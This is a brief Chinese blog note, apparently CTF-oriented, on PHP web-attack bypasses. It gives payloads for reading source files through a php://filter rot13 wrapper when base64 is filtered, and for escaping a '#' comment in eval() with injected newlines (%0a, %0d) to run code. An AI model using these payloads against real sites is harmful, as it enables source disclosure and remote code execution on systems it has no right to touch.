1、过滤base,文件包含
这种情况很可能是禁止用伪协议中的base64编码,如下例子
php://filter/read=convert.base64-encode/resource=index.php
这种情况下可以采取其他的编码方式进行读取
php://filter/read=string.rot13/resource=flag.php
2、绕过#注释符
eval("#".$cmd);
通过换行来绕过
\r => %0d
\n => %0a
\r\n
版权声明:本文为Little_jcak原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。